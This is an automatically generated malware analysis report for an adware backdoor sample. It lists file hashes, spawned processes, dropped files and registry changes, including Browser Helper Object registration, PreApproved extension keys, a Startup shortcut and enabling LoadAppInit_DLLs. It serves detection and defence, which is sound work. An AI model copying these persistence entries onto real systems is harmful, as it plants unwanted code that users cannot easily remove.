Gen.Variant.Adware.MPlug.38_874a6a15d1

by malwarelabrobot on May 11th, 2015 in Malware Descriptions.

Gen:Variant.Adware.MPlug.38 (B) (Emsisoft), Gen:Variant.Adware.MPlug.38 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)
Behaviour: Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.



MD5: 874a6a15d18c264327f5c81ec98e2cf9
SHA1: b90f3dd3fba951e828a2a234121e3fe3916cc230
SHA256: 4e8aed5e3c3e1520d6e4a473dca4d0a5240c3a36ddbd4aa1ec2e7adfef5ea047
SSDeep: 12288:Bz5KLZTKN8Vgo 2PlRiTPYwfGnU/3dMvb:Bz4LZTKzOoTPYwfGnmMT
Size: 465920 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-04 03:38:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables remote control of a victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:1932 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)

The process ArmorerRise.xyz.exe:2036 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)

The process %original file name%.exe:1176 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6 (0 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (0 bytes)

The process %original file name%.exe:1988 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca (0 bytes)

The process %original file name%.exe:368 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\2.ini (0 bytes)

The process %original file name%.exe:1888 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7 (0 bytes)

The process %original file name%.exe:188 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)

The Backdoor deletes the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1 (0 bytes)

The process %original file name%.exe:1016 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0e466769 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (0 bytes)

Registry activity

The process regsvr32.exe:1932 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6942a161-f713-42a7-a4aa-3bafc71fc8a6}" = "1"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\0\win32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CurVer]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\ProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\VersionIndependentProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}]
"(Default)" = "IRegistry"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\HELPDIR]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}]
"(Default)" = "IRuntime"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_]
"(Default)" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 23 59 E0 34 27 93 FA 50 40 84 2D 22 09 F9 23"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\Programmable]
"(Default)" = ""

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}]
"(Default)" = "ILocalStorage"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

The process regsvr32.exe:1980 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\0\win32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\ProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\VersionIndependentProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_]
"(Default)" = "WWhiteCouPooni"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}]
"(Default)" = "IRegistry"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9]
"(Default)" = "WWhiteCouPooni"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\Programmable]
"(Default)" = ""

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D3 10 D1 CD AA 10 F1 E6 87 98 BE 13 27 48 F6"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}]
"(Default)" = "IRuntime"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\HELPDIR]
"(Default)" = "%Program Files%\WWhiteCouPooni"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CurVer]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6dd13515-e089-4fae-8645-2fa8c57153de}" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"
"NoExplorer" = "1"

The process ArmorerRise.xyz.exe:2036 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"fe94ce1e" = "V/////%%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Publisher" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"3c09c42b" = "///%"
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoRepair" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"DisplayName" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"State" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Cache" = "9428760297565573948"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
